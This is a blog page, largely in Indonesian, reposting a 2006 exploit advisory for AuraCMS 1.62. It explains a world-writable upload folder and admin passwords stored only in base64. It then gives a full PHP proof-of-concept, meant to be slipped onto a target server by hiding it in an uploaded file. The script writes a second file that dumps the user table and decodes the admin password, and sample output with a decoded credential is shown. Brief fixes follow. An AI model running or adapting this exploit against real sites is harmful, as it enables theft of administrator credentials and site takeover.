LaGiPusHinGWitH ---- IT

Navigation

Home |

Categories

• Computer Hacking
• Computer Diary
• Computer DataBase
• Computer Propaganda
• Computer Prophile
• Computer Security
• Computer Unix

Monthly Archives

• September 2010
• October 2009
• December 2008
• November 2008
• October 2008
• September 2008
• July 2008
• May 2008
• March 2008
• December 2007
• October 2007
• September 2007
• August 2007

Most recent entries

• Create Oracle Tablespace on SAP with BRTools
• Audit on Oracle Database
• Membuat Oracle Data Guard
• Cerita Tentang Kamu
• Membuat ulang/re-create controlfile di oracle
• Membuat RMAN dengan crontab
• Saat kau hadir kembali
• Memindahkan controlfile dan redologfile pada Oracle
• Oracle Dataguard on Standart Edition
• Adakah aku dihatimu
• Instalasi 10g di HP-UX Itanium
• Instalasi OpenOffice di Slackware 12
• Syncronize archive log
• Merubah ukuran archived Log
• Alter Block Size for tablespace

Syndicate

• RSS 2.0
• Atom

Site Credits

Powered by:
ExpressionEngine

Design by:
BlogMoxie

Author: roninmorgue
Date: May, 27th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
-----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AuraCMS162 is a free Content Management System, written in php.
Author: Arif Supriyanto - arif@ayo.kliksini.com
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com

Version : 1.62
tested on AuraCMS1.62
not tested on other/older or maybe the newer version but it is
possible be the same
-----------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
Setelah begitu banyaknya vulnerability yang ditemukan sampai dengan versi 1.61,
dimana saya sendiri menemukannya dan telah mengontak vendor serta mendapatkan
tanggapan yang posistif maka vendor mengeluarkan versi 1.62 yang telah melakukan
patching terhadap file-file yang mengandung vulenerability.

vulnerability yang masih dapat diexploit pada versi 1.62 ->

A. PHP Local Root Exploit :

petunjuk peng-install-an AuraCMS162 ->

Upload file ke webhosting.
set file permission seperti berikut :
chmod 755 untuk file-file *.php
chmod 777 untuk folder /images
chmod 777 untuk folder /files
chmod 777 to file /mod/online.db.txt
chmod 777 to file /mod/counter.txt
chmod 777 to file /mod/month.txt
chmod 777 to file /mod/today.txt

terlihat bahwa folder /files memberikan akses 777, dimana kita dapat menulis file
pada folder tersebut.

Folder /files adalah folder yang digunakan untuk menyimpan file-file yang dapat
didownload serta kita dapat menguploadnya.

B. Administrator Account Vulnerability :

AuraCMS <= 1.62 tidak melakukan enkripsi terhadap username pada tabel user;
AuraCMS <= 1.62 menggunakan enkripsi fungsi base64_encode untuk menyimpan password admin
sebagaimana kita ketahui bahwa fungsi base64_encode dapat kita dekripsi dengan fungsi
base64_decode dengan mudah…

log.php

if(ereg("log.php",$PHP_SELF)) {
if ($_POST[k]==’check’){
include “config.php”;
$result = mysql_query("SELECT * FROM user WHERE user=’$user’”, $koneksi_db);
$num = mysql_numrows($result);
$row = mysql_fetch_row($result);
$password = base64_encode($password);
if($password!=$row[3] || $num<=0){echo”
alert(’Username or Password is wrong !’);
window.history.go(-1); “;}
else{
session_register("info");
//session_register("user_loged");
$info = base64_encode("$row[1]:$row[2]:$row[3]");
=====================potong==============================
Jadi sekarang bagaimana kita mengexploitasi auracms162 dari 2 buah vulnerability yang
kita ketahui… , Ok!!langsung saja, saya telah menulis script sederhana untuk mendapatkan
account dari administrator dan mendekripsinya.

Catt : script ini harus diupload ke server target -> http://www.target.com/files/auraExploit.php
caranya -> terserah anda, bisa dengan menyisipkan script ini pada file yang akan kita upload
dan berdoa mudah-mudahan adminnya ngga tahu… smile

poc :

auraExploit.php
<?php
/*****************************************************/
/* Hacking AuraCMS162: Hacking auraCMS162 with PHP Local Root Exploit */
/* ===========================================================*/
/* */
/* Copyright (c) 2006 by anstellwinkel (anstellwinkel@yahoo.com.au) */
/* or roninmorgue@yahoo.co.id */
/* */
/* Program ini adalah free software. Anda dapat mendistribusikannya dan */
/* memodifikasinya sesuai keinginan anda dengan tetap menyertakan */
/* nama author */
/* Published Date:12:15:47 Sunday, May 28, 2006 */
/****************************************************/

print " =======================================";
print " AuraCMS162 Local Root Exploit";
print " =======================================";

print "[+] Now attacking ";
print "[+] Building page extension..";
$exploit_file = fopen("hackaura.php", "a+");
print "[DONE]";
print "[+] Set User Autentification..";
$the_exploit = "<?
include("../config.php");
mysql_connect($mysql_host, $mysql_user, $mysql_password);
$hasil =mysql_db_query($mysql_database, "SELECT * FROM user");
while($data = mysql_fetch_array($hasil))
{
$user = $data[user];
$pass = $data[password];
}
echo "Username: $user";
echo "EncryptPassword: $pass";
echo "DecryptPassword:";
echo base64_decode($pass);

?>”;
print “[DONE]”;
print “[+] Sending bugs writable [a+]..”;
print “[+] Create hackaura.php...”;
if (flock($exploit_file, LOCK_EX)) {
fputs($exploit_file, $the_exploit);
flock($exploit_file, LOCK_UN);
print “[OK] “;

print “[+] Sending bugs..[DONE]!!”;
print “[*] Exploited Successed!”;
print “ “;
print “------------------------------------------------”;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +”;
print “-----------------------------------------------------”;
}else {

print “[!] [FAILED] Permission is not writable!!”;
print “-----------------------------------------------”;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +”;
print “----------------------------------------------------”;
}

fclose($exploit_file);
print “<a href=hackaura.php>Aura Administrator Exploited”;
?>
------------------[EOF]-----------------------------------
attack sample
target ->> http://jouninhackers/auracms162/files/auraExploit.php

=======================================
AuraCMS162 Local Root Exploit
=======================================
[+] Now attacking
[+] Building page extension..[DONE]
[+] Set User Autentification..[DONE]
[+] Sending bugs writable [a+]..
[+] Create hackaura.php...[OK] [+] Sending bugs..[DONE]!!
[*] Exploited Successed!
------------------------------------------------------------------
+ Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
------------------------------------------------------------------
Aura Administrator Exploited

klik link “Aura Administrator Exploited”

http://jouninhackers/auracms162/files/hackaura.php
Username: roninmorgue
EncryptPassword: cjBuMW5tMHJndTM=
DecryptPassword:r0n1nm0rgu3
------------------------------------------------------------------
The fix:
~~~~~~~~

Vendor sudah dihubungi,
Perbaikan sendiri:
1. matikan fungsi modul download/upload.
2. jika tetap mengaktifkannya periksa dengan teliti setiap file yang diupload, ingat anda
adalah admin..!!!
3. buat fungsi untuk menghapus setiap file yang memiliki extension .php pada folder /files
dan /images.
4. ganti enkripsi password dengan fungsi MD5

----------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, cloud, newbie)
~ mercubuana-it@yahoogroups.com ,
---------------------------------------------------------------
Contact:
~~~~~~~~

roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
-------------------------------- [ EOF ] ---------------------